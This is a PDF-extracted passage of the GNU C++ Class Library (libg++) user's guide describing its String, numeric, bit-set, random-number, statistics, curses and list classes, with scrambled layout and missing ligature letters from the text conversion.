Regex Regex Regex Regex Regex 17.2 Examples Most String class capabilities are best shown via example. The examples below use the following declarations. Chapter 17: The String class 53"; 17.3 Comparing, Searching and Matching The usual lexicographic relational operators (==, !=, <, <=, >, >=) are dened. A functional form compare(String, String) is also provided, as is fcompare(String, String), which compares Strings without regard for upper vs. lower case. All other matching and searching operations are based on some form of the (non-public) match and search functions. match and search dier in that match attempts to match only at the given starting position, while search starts at the position, and then proceeds left or right looking for a match. As seen in the following examples, the second optional startpos argument to functions using match and search species. returns the index of the rst of the leftmost occurrence of "l" found starting the search at position x[2], or 2 in this case. returns the index of the rightmost occurrence of "l", or 3 here. x.index("l", 2) x.index("l", -1) x.index("l", -3) returns the index of the rightmost occurrence of "l" found by starting the search at the 3rd to the last position of x, returning 2 in this case. 54 User's Guide to the GNU C++ Class Library pos = r.search("leo", 3, len, 0) returns the index of r in the char* string of length 3, starting at position 0, also placing the length of the match in reference parameter len. returns nonzero if the String x contains the substring "He". The argument may be a String, SubString, char, char*, or Regex. returns nonzero if x contains the substring "el" at position 1. As in this example, the second argument to contains, if present, means to match the substring only at that position, and not to search elsewhere in the string. returns nonzero if x contains any whitespace (space, tab, or newline). Recall that RXwhite is a global whitespace Regex. returns nonzero if x starting at position 3 exactly matches "lo", with no trailing characters (as it does in this example). returns nonzero if String x as a whole matches Regex r. x.contains("He") x.contains("el", 1) x.contains(RXwhite); x.matches("lo", 3) x.matches(r) int f = x.freq("l") returns the number of distinct, nonoverlapping matches to the argument (2 in this case). 17.4. Sets what was in positions 2 to 3 of x to "r", setting x to "Hero" in this case. As indicated here, SubString assignments may be of dierent lengths. the substring of x that matches the rst occurrence of it's argument. The substitution sets x to "jello". If "He" did not occur, the substring would be nil, and the assignment would have no eect. replaces the rightmost occurrence of "l" with "i", setting x to "Helio". sets String z to the rst match in x of Regex r, or "ello" in this case. A nil String is returned if there is no match. x.at(2, 2) = "r" x.at("He") = "je"; x("He") is x.at("l", -1) = "i"; z = x.at(r) Chapter 17: The String class 55 z = x.before("o") sets z to the part of x to the left of the rst occurrence of "o", or "Hell" in this case. The argument may also be a String, SubString, or Regex. (If there is no match, z is set to "".) sets the part of x to the left of "ll" to "Bri", setting x to "Brillo". sets z to the part of x to the left of x[2], or "He" in this case. sets z to the part of x to the right of "Hel", or "lo" in this case. sets z to the part of x up and including "el", or "Hel" in this case. sets z to the part of x from "el" to the end, or "ello" in this case. x.before("ll") = "Bri"; z = x.before(2) z = x.after("Hel") z = x.through("el") z = x.from("el") x.after("Hel") = "p"; sets x to "Help"; z = x.after(3) sets z to the part of x to the right of x[3] or "o" in this case. sets z to the part of its old string to the right of the rst group of whitespace, setting z to "ab c"; Use gsub(below) to strip out multiple occurrences of whitespace or any pattern. sets the rst element of x to 'J'. x[i] returns a reference to the ith element of x, or triggers an error if i is out of range. returns the String containing the common prex of the two Strings or "Hel" in this case. returns the String containing the common sux of the two Strings or "o" in this case. z = " ab c"; z = z.after(RXwhite) x[0] = 'J'; common_prefix(x, "Help") common_suffix(x, "to") 17.5 Concatenation z = x + s + ' ' + y.at("w") + y.after("w") + "."; sets z to "Hello, world." x += y; sets x to "Helloworld" cat(x, y, z) A faster way to say z = x + y. Double concatenation; A faster way to say x = z + y + x. cat(z, y, x, x) 56 User's Guide to the GNU C++ Class Library y.prepend(x); A faster way to say y = x + y. z = replicate(x, 3); sets z to "HelloHelloHello". z = join(words, 3, "/") sets z to the concatenation of the rst 3 Strings in String array words, each separated by "/", setting z to "a/b/c" in this case. The last argument may be "" or 0, indicating no separation. 17.6. substitutes all original occurrences of "l" with "ll", setting x to "Hellllo". The rst argument may be any of the usual, including Regex. If the second argument is "" or 0, all occurrences are deleted. gsub returns the number of matches that were replaced. deletes the leftmost occurrence of "loworl" in z, setting z to "Held". sets z to the reverse of x, or "olleH". sets z to x, with all letters set to uppercase, setting z to "HELLO" sets z to x, with all letters set to lowercase, setting z to "hello" sets z to x, with the rst letter of each word set to uppercase, and all others to lowercase, setting z to "Hello" in-place, self-modifying versions of the above. int nmatches x.gsub("l","ll") z = x + y; z.del("loworl"); z = reverse(x) z = upcase(x) z = downcase(x) z = capitalize(x) x.reverse(), x.upcase(), x.downcase(), x.capitalize() 17.7 Reading, Writing and Conversion cout << x writes out x. writes out the substring "llo". reads a whitespace-bounded string into x. cout << x.at(2, 3) cin >> x Chapter 17: The String class 57 x.length() returns the length of String x (5, in this case). dened to return a const value so that GNU C++ will produce warning and/or error messages if changes are attempted.) s = (const char*)x 58 User's Guide to the GNU C++ Class Library Chapter 18: The Integer class. 59 18 The Integer class. dicult; Declares an uninitialized Integer. Set x and y to the Integer value 2; Set u and v to the same value as x. Integer x = 2; Integer y(2); Integer u(x); Integer v = x; Integer::as long const Method Used to coerce an Integer back into longs via the long coercion operator. If the Integer cannot t into a long, this returns MINLONG or MAXLONG (depending on the sign) where MINLONG is the most negative, and MAXLONG is the most positive representable long. int Integer::ts in long const Method Returns true i the Integer is < MAXLONG and > MINLONG. double Integer::as double const Method Coerce the Integer to a double, with potential loss of precision. +/-HUGE is returned if the Integer cannot t into a double. int Integer::ts in double const Method Returns true i the Integer can t dierently than the corresponding int or long operators are ++ and --. Because C++ does not distinguish prex from postx application, these are declared as void operators, so that no confusion can result from applying them as postx. rst argument. For example, Integer(-3) & Integer(5) returns long 60 User's Guide to the GNU C++ Class Library). void divide(const Integer& x, const Integer& y, Integer& q, Function Integer& r ) Sets q to the quotient and r to the remainder of x and y. (q and r are returned by reference). Integer pow(const Integer& x, const Integer& p) Function Returns x raised to the power p. Integer Ipow(long x, long p Function Returns x raised to the power p. Integer gcd(const Integer& x, const Integer& p) Function Returns the greatest common divisor of x and y. Integer lcm(const Integer& x, const Integer& p) Function Returns the least common multiple of x and y. Integer abs(const Integer& x Function Returns the absolute value of x. void Integer::negate Method Negates this in place. Integer sqr(x) returns x * x; returns the oor of the square root of x. returns the oor of the base 2 logarithm of abs(x) returns -1 if x is negative, 0 if zero, else +1. Using if (sign(x) == 0) is a generally faster method of testing for zero than using relational operators. returns true if x is an even number returns true if x is an odd number. sets the b'th bit (counting right-to-left from zero) of x to 1. sets the b'th bit of x to 0. Integer sqrt(x) long lg(x); int sign(x) int even(x) int odd(x) void setbit(Integer& x, long b) void clearbit(Integer& x, long b) Chapter 18: The Integer class. 61 int testbit(Integer x, long b) returns true if the b'th bit of x is 1. converts the base base char* string into its Integer form. in eld width at least Integer atoI(char* asciinumber, int base = 10); void Integer::printon(ostream& s, int base = 10, int width = 0); prints the ascii string value of (*this) as a base base number, width. ostream << x; istream >> x; prints x in base ten format. reads x as a base ten number. returns a negative number if x<y, zero if x==y, or positive if x>y. like compare, but performs unsigned comparison. = pow(x, y). A faster way to say z = ) 62 User's Guide to the GNU C++ Class Library negate(x, z) A faster way to say z = -x. Chapter 19: The Rational Class 63 19 The Rational Class Class Rational provides multiple precision rational number arithmetic. All rationals are maintained in simplest form (i.e., with the numerator and denominator relatively prime, and with the denominator strictly positive). Rational arithmetic and relational operators are provided (+, -, *, /, +=, -=, *=, /=, ==, !=, <, <=, >, >=). Operations resulting in a rational number with zero denominator trigger an exception. Rationals may be constructed and used in the following ways: Rational x; Declares an uninitialized Rational. Set x and y to the Rational value 2/1; Sets x to the Rational value 2/3; Sets x to a Rational value close to 1.2. Any double precision value may be used to construct a Rational. The Rational will possess exactly as much precision as the double. Double values that do not have precise oating point equivalents (like 1.2) produce similarly imprecise rational values. Sets x to the Rational value 123/4567. Set u and v to the same value as x. A Rational may be coerced to a double with potential loss of precision. +/-HUGE is returned if it will not t. returns the absolute value of x. negates x. sets x to 1/x. returns 0 if x is zero, 1 if positive, and -1 if negative. returns x * x. returns x to the y power. returns the numerator. Rational x = 2; Rational y(2); Rational x(2, 3); Rational x = 1.2; Rational x(Integer(123), Integer(4567)); Rational u(x); Rational v = x; double(Rational x) Rational abs(x) void x.negate() void x.invert() int sign(x) Rational sqr(x) Rational pow(x, Integer y) Integer x.numerator() 64 User's Guide to the GNU C++ Class Library Integer x.denominator() Integer floor(x) Integer ceil(x) returns the denominator. returns the greatest Integer less than x. returns the least Integer greater than x. returns the Integer part of x. returns the nearest Integer to x. returns a negative, zero, or positive number signifying whether x is less than, equal to, or greater than y. prints x in the form num/den, or just num if the denominator is one. Integer trunc(x) Integer round(x) int compare(x, y) ostream << x; istream >> x; add(x, y, z) sub(x, y, z) mul(x, y, z) div(x, y, z) pow(x, y, z) reads x in the form num/den, or just num in which case the denominator is set to one. A faster way to say z = x + y. A faster way to say z = x - y. A faster way to say z = x * y. A faster way to say z = x / y. A faster way to say z = pow(x, y). A faster way to say z = -x. negate(x, z) Chapter 20: The Complex class. 65 20 The Complex class.; Declares an uninitialized Complex. Set x and y to the Complex value (2.0, 0.0); Sets x to the Complex value (2, 3); Set u and v to the same value as x. returns the real part of x. returns the imaginary part of x. returns the magnitude of x. returns the square of the magnitude of x. returns the argument (amplitude) of x. returns a Complex with abs of r and arg of t. returns the complex conjugate of x. returns the complex cosine of x. returns the complex sine of x. returns the complex hyperbolic cosine of x. returns the complex hyperbolic sine of x. returns the exponential of); 66 User's Guide to the GNU C++ Class Library Complex log(Complex& x); returns the natural log of x. returns x raised to the p power. returns x raised to the p power. returns the square root of x. prints x in the form (re, im). reads x in the form (re, im), or just (re) or re in which case the imaginary part is set to zero. Complex pow(Complex& x, long p); Complex pow(Complex& x, Complex& p); Complex sqrt(Complex& x); ostream << x; istream >> x; Chapter 21: Fixed precision numbers 67 21 Fixed precision numbers Classes Fix16, Fix24, Fix32, and Fix48 support operations on 16, 24, 32, or 48 bit quantities that are considered as real numbers in the range [-1, +1). Such numbers are often encountered in digital signal processing applications. The classes may be be used in isolation or together. Class Fix32 operations are entirely self-contained. Class Fix16 operations are self-contained except that the multiplication operation Fix16 * Fix16 returns a Fix32. Fix24 and Fix48 are similarly related. The standard arithmetic and relational operations are supported (=, +, -, *, /, <<, >>, +=, -=, *=, /=, <<=, >>=, ==, !=, <, <=, >, >=). All operations include provisions for special handling in cases where the result exceeds +/- 1.0. There are two cases that may be handled separately: \over ow" where the results of addition and subtraction operations go out of range, and all other \range errors" in which resulting values go o-scale (as with division operations, and assignment or initialization with o-scale values). In signal processing applications, it is often useful to handle these two cases dierently. Handlers take one argument, a reference to the integer mantissa of the oending value, which may then be manipulated. In cases of over ow, this value is the result of the (integer) arithmetic computation on the mantissa; in others it is a fully saturated (i.e., most positive or most negative) value. Handling may be reset to any of several provided functions or any other user-dened function via set_overflow_handler and set_range_error_handler. The provided functions for Fix16 are as follows (corresponding functions are also supported for the others). Fix16_overflow_saturate The default over ow handler. Results are \saturated": positive results are set to the largest representable value (binary 0.111111...), and negative values to -1.0. Performs no action. For over ow, this will allow addition and subtraction operations to \wrap around" in the same manner as integer arithmetic, and for saturation, will leave values saturated. Prints a warning message on standard error, then saturates the results. Fix16_ignore Fix16_overflow_warning_saturate Fix16_warning The default range error handler. Prints a warning message on standard error; otherwise leaving the argument unmodied. Fix16_abort prints an error message on standard error, then aborts execution. In addition to arithmetic operations, the following are provided: Constructs xed precision objects from double precision values. Attempting to initialize to a value outside the range invokes the range error handler, except, as a convenience, initialization to 1.0 sets the variable to the most positive representable value (binary 0.1111111...) without invoking the handler. return a * pow(2, 15) or b * pow(2, 31) as an integer. These are returned by reference, to enable \manual" data manipulation. Fix16 a = 0.5; short& mantissa(a); long& mantissa(b); 68 User's Guide to the GNU C++ Class Library double value(a); double value(b); return a or b as oating point numbers. Chapter 22: Classes for Bit manipulation 69 22 Classes for Bit manipulation libg++ provides several dierent classes supporting the use and manipulation of collections of bits in dierent ways. Class Integer provides \integer" semantics. It supports manipulation of bits in ways that are often useful when treating bit arrays as numerical (integer) quantities. This class is described elsewhere. Class BitSet provides \set" semantics. It supports operations useful when treating collections of bits as representing potentially innite sets of integers. Class BitSet32 supports xed-length BitSets holding exactly 32 bits. Class BitSet256 supports xed-length BitSets holding exactly 256 bits. Class BitString provides \string" (or \vector") semantics. It supports operations useful when treating collections of bits as strings of zeros and ones. These classes also dier in the following ways: BitSets are logically innite. Their space is dynamically altered to adjust to the smallest number of consecutive bits actually required to represent the sets. Integers also have this property. BitStrings are logically nite, but their sizes are internally dynamically managed to maintain proper length. This means that, for example, BitStrings are concatenatable while BitSets and Integers are not. BitSet32 and BitSet256 have precisely the same properties as BitSets, except that they use constant xed length bit vectors. While all classes support basic unary and binary operations ~, &, |, ^, -, the semantics dier. BitSets perform bit operations that precisely mirror those for innite sets. For example, complementing an empty BitSet returns one representing an innite. Only BitStrings support substring extraction and bit pattern matching. 22.1 BitSet BitSets are objects that contain logically innite sets of nonnegative integers. Representational details are discussed in the Representation chapter. Because they are logically innite, all BitSets possess a trailing, innitely replicated 0 or 1 bit, called the \virtual bit", and indicated via 0* or 1*. BitSet32 and BitSet256 have they same properties, except they are of xed length, and thus have no virtual bit. BitSets may be constructed as follows: BitSet a; declares an empty BitSet. BitSet a = atoBitSet("001000"); sets a to the BitSet 0010*, reading left-to-right. The \0*" indicates that the set ends with an innite number of zero (clear) bits. 70 User's Guide to the GNU C++ Class Library BitSet a = atoBitSet("00101*"); sets a to the BitSet 00101*, where \1*" means that the set ends with an innite number of one (set) bits. sets a to the BitSet 111010*, the binary representation of decimal 23. BitSet a = longtoBitSet((long)23); BitSet a = utoBitSet((unsigned)23); sets a to the BitSet 111010*, the binary representation of decimal 23. The following functions and operators are provided (Assume the declaration of BitSets a = 0011010*, b = 101101*, throughout, as examples). ~a returns the complement of a, or 1100101* in this case. a.complement() a & b; a &= b; a | b; a |= b; a - b; a -= b; a ^ b; a ^= b; a.empty() a == b; a <= b; a < b; sets a to ~a. returns a intersected with b, or 0011010*. returns a unioned with b, or 1011111*. returns the set dierence of a and b, or 000010*. returns the symmetric dierence of a and b, or 1000101*. returns true if a is an empty set. returns true if a and b contain the same set. returns true if a is a subset of b. returns true if a is a proper subset of b; are the converses of the above. sets the 7th (counting from 0) bit of a, setting a to 001111010* clears the 2nd bit bit of a, setting a to 00011110* clears all bits of a; sets all bits of a; complements the 0th bit of a, setting a to 10011110* sets the 0th through 1st bits of a, setting a to 110111110* The two-argument versions of clear and invert are similar. a != b; a >= b; a > b; a.set(7) a.clear(2) a.clear() a.set() a.invert(0) a.set(0,1) Chapter 22: Classes for Bit manipulation 71 a.test(3) returns true if the 3rd bit of a is set. returns true if any of bits 3 through 5 are set. a.test(3, 5) int i = a[3]; a[3] = 0; The subscript operator allows bits to be inspected and changed via standard subscript semantics, using a friend class BitSetBit. The use of the subscript operator a[i] rather than a.test(i) requires somewhat greater overhead. returns the index of the rst set bit of a (2 in this case), or -1 if no bits are set. returns the index of the rst clear bit of a (0 in this case), or -1 if no bits are clear. returns the index of the next bit after position 2 that is set (3 in this case) or -1. first and next may be used as iterators, as in for (int i = a.first(); i >= 0; i = a.next(i)).... returns the index of the rightmost set bit, or -1 if there or no set bits or all set bits. returns the index of the previous clear bit before position 3. returns the number of set bits in a, or -1 if there are an innite number. returns the trailing (innitely replicated) bit of a. converts the char* string into a bitset, with 'a' denoting false, 'b' denoting true, and 'X' denoting innite replication. marker. prints a to cout (representing lases by 'f', trues by 't', and using '*' as the replication marker). A faster way to say z = x - y. A faster way to say z = x & y. A faster way to say z = x | y. A faster way to say z = x ^ y. with '-' a.first(1) or a.first() a.first(0) a.next(2, 1) or a.next(2) a.last(1) a.prev(3, 0) a.count(1) a.virtual_bit() a = atoBitSet("ababX", 'a', 'b', 'X'); a.printon(cout, '-', '.', 0) prints a to cout represented cout << a for falses, '.' for trues, and no replication diff(x, y, z) and(x, y, z) or(x, y, z) xor(x, y, z) 72 User's Guide to the GNU C++ Class Library complement(x, z) A faster way to say z = ~x. 22.2 BitString rst; Sets a to the concatenation of b and c; a = b + 0; a = b + 1; sets a to b, appended with a zero (one). Chapter 22: Classes for Bit manipulation 73 a += b; appends b to a; appends a zero (one) to a. return a with 2 zeros prepended, setting a to 0001010110. (Note the necessary confusion of << and >> operators. For consistency with the integer versions, << shifts low bits to high, even though they are printed low bits rst.) return a with the rst 3 bits deleted, setting a to 10110. deletes all 0 bits on the left of a, setting a to 1010110. deletes all trailing 0 bits of a, setting a to 0101011..) 74 User's Guide to the GNU C++ Class Library Chapter 23: Random Number Generators and related classes 75 23 Random Number Generators and related classes The two classes RNG and Random are used together to generate a variety of random number distributions. A distinction must be made between random number generators, implemented by class RNG, and random number distributions. A random number generator produces a series of randomly ordered bits. These bits can be used directly, or cast to other representations, such as a oating point value. A random number generator should produce a uniform distribution. A random number distribution, on the other hand, uses the randomly generated bits of a generator to produce numbers from a distribution with specic properties. Each instance of Random uses an instance of class RNG to provide the raw, uniform distribution used to produce the specic distribution. Several instances of Random classes can share the same instance of RNG, or each instance can use its own copy. 23.1 RNG Random distributions are constructed from members of class RNG, the actual random number generators. The RNG class contains no data; it only serves to dene the interface to random number generators. The RNG::asLong member returns an unsigned long (typically 32 bits) of random bits. Applications that require a number of random bits can use this directly. More often, these random bits are transformed to a uniform random number: // // Return random bits converted to either a float or a double // float asFloat(); double asDouble(); using either asFloat or asDouble. It is intended that asFloat and asDouble return diering precisions; typically, asDouble will draw two random longwords and transform them into a legal double, while asFloat will draw a single longword and transform it into a legal float. These members are used by subclasses of the Random class to implement a variety of random number distributions. }; 23.2 ACG Class ACG is a variant of a Linear Congruential Generator (Algorithm M) described in Knuth, Art of Computer Programming, Vol III. This result is permuted with a Fibonacci Additive Congruential Generator to get good independence between samples. This is a very high quality random number generator, although it requires a fair amount of memory for each instance of the generator. The ACG::ACG constructor takes two parameters: the seed and the size. The seed is any number to be used as an initial seed. The performance of the generator depends on having a distribution of bits through the seed. If you choose a number in the range of 0 to 31, a seed with more bits is chosen. Other values are deterministically modied to give a better distribution of bits. This provides a good random number generator while still allowing a sequence to be repeated given the same initial seed. The size parameter determines the size of two tables used in the generator. The rst table is used in the Additive Generator; see the algorithm in Knuth for more information. In general, 76 User's Guide to the GNU C++ Class Library this table is size longwords long. The default value, used in the algorithm in Knuth, gives a table of 220 bytes. The table size aects the period of the generators; smaller values give shorter periods and larger tables give longer periods. The smallest table size is 7 longwords, and the longest is 98 longwords. The size parameter also determines the size of the table used for the Linear Congruential Generator. This value is chosen implicitly based on the size of the Additive Congruential Generator table. It is two powers of two larger than the power of two that is larger than size. For example, if size is 7, the ACG table is 7 longwords and the LCG table is 128 longwords. Thus, the default size (55) requires 55 + 256 longwords, or 1244 bytes. The largest table requires 2440 bytes and the smallest table requires 100 bytes. Applications that require a large number of generators or applications that aren't so fussy about the quality of the generator may elect to use the MLCG generator. 23.3 MLCG The MLCG class implements a Multiplicative Linear Congruential Generator. In particular, it is an implementation of the double MLCG described in \Ecient and Portable Combined Random Number Generators" by Pierre L'Ecuyer, appearing in Communications of the ACM, Vol. 31. No. 6. This generator has a fairly long period, and has been statistically analyzed to show that it gives good inter-sample independence. The MLCG::MLCG constructor has two parameters, both of which are seeds for the generator. As in the MLCG generator, both seeds are modied to give a \better" distribution of seed digits. Thus, you can safely use values such as `0' or `1' for the seeds. The MLCG generator used much less state than the ACG generator; only two longwords (8 bytes) are needed for each generator. 23.4 Random A random number generator may be declared by rst declaring a RNG and then a Random. For example, ACG gen(10, 20); NegativeExpntl rnd (1.0, &gen); declares an additive congruential generator with seed 10 and table size 20, that is used to generate exponentially distributed values with mean of 1.0. The virtual member Random::operator() is the common way of extracting a random number from a particular distribution. The base class, Random does not implement operator(). This is performed by each of the subclasses. Thus, given the above declaration of rnd, new random values may be obtained via, for example, double next_exp_rand = rnd(); Currently, the following subclasses are provided. 23.5 Binomial The binomial distribution models successfully drawing items from a pool. The rst parameter to the constructor, n, is the number of items in the pool, and the second parameter, u, is the probability of each item being successfully drawn. The member asDouble returns the number of samples drawn from the pool. Although it is not checked, it is assumed that n>0 and 0 <= u <= 1. The remaining members allow you to read and set the parameters. Chapter 23: Random Number Generators and related classes 77 23.6 Erlang The Erlang class implements an Erlang distribution with mean mean and variance variance. 23.7 Geometric The Geometric class implements a discrete geometric distribution. The rst parameter to the constructor, mean, is the mean of the distribution. Although it is not checked, it is assumed that 0 <= mean <= 1. Geometric() returns the number of uniform random samples that were drawn before the sample was larger than mean. This quantity is always greater than zero. 23.8 HyperGeometric The HyperGeometric class implements the hypergeometric distribution. The rst parameter to the constructor, mean, is the mean and the second, variance, is the variance. The remaining members allow you to inspect and change the mean and variance. 23.9 NegativeExpntl The NegativeExpntl class implements the negative exponential distribution. The rst parameter to the constructor is the mean. The remaining members allow you to inspect and change the mean. 23.10 Normal mean, The Normalclass implements the normal distribution. The rst parameter to the constructor, is the mean and the second, variance, is the variance. The remaining members allow you to inspect and change the mean and variance. The LogNormal class is a subclass of Normal. 23.11 LogNormal The LogNormalclass implements the logarithmic normal distribution. The rst parameter to the constructor, mean, is the mean and the second, variance, is the variance. The remaining members allow you to inspect and change the mean and variance. The LogNormal class is a subclass of Normal. 23.12 Poisson The Poisson class implements the poisson distribution. The rst parameter to the constructor is the mean. The remaining members allow you to inspect and change the mean. 78 User's Guide to the GNU C++ Class Library 23.13 DiscreteUniform The DiscreteUniform class implements a uniform random variable over the closed interval ranging from [low..high]. The rst parameter to the constructor is low, and the second is high, although the order of these may be reversed. The remaining members allow you to inspect and change low and high. 23.14 Uniform The Uniform class implements a uniform random variable over the open interval ranging from [low..high). The rst parameter to the constructor is low, and the second is high, although the order of these may be reversed. The remaining members allow you to inspect and change low and high. 23.15 Weibull The Weibull class implements a weibull distribution with parameters alpha and beta. The rst parameter to the class constructor is alpha, and the second parameter is beta. The remaining members allow you to inspect and change alpha and beta. 23.16 RandomInteger The RandomInteger class is not a subclass of Random, but a stand-alone integer-oriented class that is dependent on the RNG classes. RandomInteger returns random integers uniformly from the closed interval [low..high]. The rst parameter to the constructor is low, and the second is high, although both are optional. The last argument is always a generator. Additional members allow you to inspect and change low and high. Random integers are generated using asInt() or asLong(). Operator syntax (()) is also available as a shorthand for asLong(). Because RandomInteger is often used in simulations for which uniform random integers are desired over a variety of ranges, asLong() and asInt have high as an optional argument. Using this optional argument produces a single value from the new range, but does not change the default range. Chapter 24: Data Collection 79 24 Data Collection Libg++ currently provides two classes for data collection and analysis of the collected data. 24.1 SampleStatistic Class SampleStatistic provides a means of accumulating samples of double values and providing common sample statistics. Assume declaration of double x. SampleStatistic a; a.reset(); a += x; declares and initializes a. re-initializes a. adds sample x. returns the number of samples. returns the means of the samples. returns the sample variance of the samples. returns the sample standard deviation of the samples. returns the minimum encountered sample. returns the maximum encountered sample. returns the p-percent (0 <= p < 100) condence interval. int n = a.samples(); x = a.mean; x = a.var() x = a.stdDev() x = a.min() x = a.max() x = a.confidence(int p) x = a.confidence(double p) returns the p-probability (0 <= p < 1) condence interval. 24.2 SampleHistogram Class SampleHistogram is a derived class of SampleStatistic that supports collection and display of samples in bucketed intervals. It supports the following in addition to SampleStatisic operations. SampleHistogram h(double lo, double hi, double width); declares and initializes h to have buckets of size width from lo to hi. If the optional argument width is not specied, 10 buckets are created. The rst bucket and also holds samples less than lo, and the last one holds samples greater than hi. 80 User's Guide to the GNU C++ Class Library int n = h.similarSamples(x) int n = h.inBucket(int i) int b = h.buckets() returns the number of samples in the same bucket as x. returns the number of samples in bucket i. returns the number of buckets. prints bucket counts on ostream s. returns the upper bound of bucket i. h.printBuckets(ostream s) double bound = h.bucketThreshold(int i) Chapter 25: Curses-based classes 81 25 Curses-based classes The' les." prex is generally dropped. Descriptions of these functions may be found in your local curses library documentation. A CursesWindow may be declared via CursesWindow w(WINDOW* win) attaches w to the existing WINDOW* win. This is constructor is normally used only in the following special case. attaches w to the default curses library standard screen window. CursesWindow w(stdscr) CursesWindow w(int lines, int cols, int begin_y, int begin_x) attaches to an allocated curses window with the indicated size and screen position. CursesWindow sub(CursesWindow& w,int l,int c,int by,int bx,char ar='a') attaches to a subwindow of w created via the curses `subwin' command. If ar is sent as `r', the origin (by, bx) is relative to the parent window, else it is absolute.() returns a pointer to the parent of the subwindow, or 0 if there is none. returns the rst child subwindow of the window, or 0 if there is none. CursesWindow* w.sibling() returns the next sibling of the subwindow, or 0 if there is none. For example, to call some function visit for all subwindows of a window, you could write void traverse(CursesWindow& w) 82 User's Guide to the GNU C++ Class Library { visit(w); if (w.child() != 0) traverse(*w.child); if (w.sibling() != 0) traverse(*w.sibling); } Chapter 26: List classes 83 26 List classes The les `g++-include/List.hP' and `g++-include/List.ccP' provide pseudo-generic Lisptype Chapter 9 [Pix], page 31 Supported operations are mirrored closely after those in Lisp. Generally, operations with functional forms are constructive, functional operations, while member forms (often with the same name) are sometimes procedural, possibly destructive operations. As with Lisp, destructive operations are supported. Programmers are allowed to change head and tail elds in any fashion, creating circular structures and the like. However, again as with Lisp, some operations implicitly assume that they are operating on pure lists, and may enter innite loops when presented with improper lists. Also, the reference-counting storage management facility may fail to reclaim unused circularly-linked nodes. Several Lisp-like higher order functions are supported (e.g., map). Typedef declarations for the required functional forms are provided int the `.h' le. For purposes of illustration, assume the specication of class intList. Common Lisp versions of supported operations are shown in brackets for comparison purposes. 26.1 Constructors and assignment intList a; [ (setq a nil) ] Declares a to be a nil intList. Declares b to be an intList with a head value of 2, and a nil tail. intList b(2); [ (setq b (cons 2 nil)) ] intList c(3, b); [ (setq c (cons 3 b)) ] b = a; [ (setq b a) ] Declares c to be an intList with a head value of 3, and b as its tail. Sets b to be the same list as a. Assume the declarations of intLists a, b, and c in the following. See Chapter 9 [Pix], page 31. 26.2 List status a.null(); OR !a; [ (null a) ] a.valid(); [ (listp a) ] returns true if a is null. returns true if a is non-null. Inside a conditional test, the void* coercion may also be used as in if (a) .... 84 User's Guide to the GNU C++ Class Library intList(); [ nil ] intList() may be used to null terminate a list, as in intList f(int x) {if (x == 0) return intList(); ... } . returns the length of a. returns the length of a, or -1 if a is circular. a.length(); [ (length a) ] a.list_length(); [ (list-length a) ] 26.3 heads and tails a.get(); OR a.head() [ (car a) ] a[2]; [ (elt a 2) ] returns a reference to the head eld. returns a reference to the second (counting from zero) head eld. returns the intList that is the tail of a. returns the intList that is the last node of a. returns the intList that is the nth node of a. sets a's tail to b. a.tail(); [ (cdr a) ] a.last(); [ (last a) ] a.nth(2); [ (nth a 2) ] a.set_tail(b); [ (rplacd a b) ] a.push(2); [ (push 2 a) ] equivalent to a = intList(2, a); returns the head of a, also setting a to its tail. int x = a.pop() [ (setq x (car a)) (pop a) ] 26.4 Constructive operations b = copy(a); [ (setq b (copy-seq a)) ] sets b to a copy of a. b = reverse(a); [ (setq b (reverse a)) ] Sets b to a reversed copy of a. c = concat(a, b); [ (setq c (concat a b)) ] c = append(a, b); [ (setq c (append a b)) ] Sets c to a concatenated copy of a and b. Sets c to a concatenated copy of a and b. All nodes of a are copied, with the last node pointing to b. Sets b to a new list created by applying function f to each node of a. b = map(f, a); [ (setq b (mapcar f a)) ] Chapter 26: List classes 85 c = combine(f, a, b); Sets c to a new list created by applying function f to successive pairs of a and b. The resulting list has length the shorter of a and b. Sets b to a copy of a, omitting all occurrences of x. Sets b to a copy of a, omitting values causing function f to return true. Sets b to a copy of a, omitting values causing function f to return false. Sets c to a list containing the ordered elements (using the comparison function f) of the sorted lists a and b. b = remove(x, a); [ (setq b (remove x a)) ] b = remove(f, a); [ (setq b (remove-if f a)) ] b = select(f, a); [ (setq b (remove-if-not f a)) ] c = merge(a, b, f); [ (setq c (merge a b f)) ] 26.5 Destructive operations a.append(b); [ (rplacd (last a) b) ] appends b to the end of a. No new nodes are constructed. prepends b to the beginning of a. deletes all nodes with value x from a. deletes all nodes causing function f to return true. deletes all nodes causing function f to return false. reverses a in-place. a.prepend(b); [ (setq a (append b a)) ] a.del(x); [ (delete x a) ] a.del(f); [ (delete-if f a) ] a.select(f); [ (delete-if-not f a) ] a.reverse(); [ (nreverse a) ] a.sort(f); [ (sort a f) ] sorts a in-place using ordering (comparison) function f. Applies void function f (int x) to each element of a. substitutes repl for each occurrence of old in a. Note the dierent argument order than the Lisp version. a.apply(f); [ (mapc f a) ] a.subst(int old, int repl); [ (nsubst repl old a) ] 26.6 Other operations a.find(int x); [ (find x a) ] returns the intList at the rst occurrence of x. 86 User's Guide to the GNU C++ Class Library a.find(b); [ (find b a) ] returns the intList at the rst occurrence of sublist b. returns true if a contains x. returns true if a contains sublist b. returns the zero-based index of x in a, or -1 if x does not occur. Accumulates the result of applying int function f(int, int) to successive elements of a, starting with base. a.contains(int x); [ (member x a) ] a.contains(b); [ (member b a) ] a.position(int x); [ (position x a) ] int x = a.reduce(f, int base); [ (reduce f a :initial-value base) ] Chapter 27: Linked Lists 87 27 Linked Lists SLLists provide pseudo-generic singly linked lists. DLLists provide doubly linked lists. The lists are designed for the simple maintenance of elements in a linked structure, and do not provide the more extensive operations (or node-sharing) of class List. They behave similarly to the slist and similar classes described by Stroustrup. All list nodes are created dynamically. Assignment is performed via copying. Class DLList supports all SLList operations, plus additional operations described below. For purposes of illustration, assume the specication of class intSLList. In addition to the operations listed here, SLLists support traversal via Pixes. See Chapter 9 [Pix], page 31 intSLList a; Declares a to be an empty list. Sets b to an element-by-element copy of a. returns true if a contains no elements returns the number of elements in a. places x at the front of the list. places x at the end of the list. places all nodes from b to the end of a, simultaneously destroying b. returns a reference to the item stored at the head of the list, or triggers an error if the list is empty. returns a reference to the rear of the list, or triggers an error if the list is empty. deletes and returns the item stored at the head of the list. deletes the rst element, without returning it. deletes all items from the list. inserts item after position i. If i is null, insertion is at the front. deletes the element following i. If i is 0, the rst item is deleted. intSLList b = a; a.empty() a.length(); a.prepend(x); a.append(x); a.join(b) x = a.front() a.rear() x = a.remove_front() a.del_front() a.clear() a.ins_after(Pix i, item); a.del_after(Pix i); 88 User's Guide to the GNU C++ Class Library 27.1 Doubly linked lists Class DLList supports the following additional 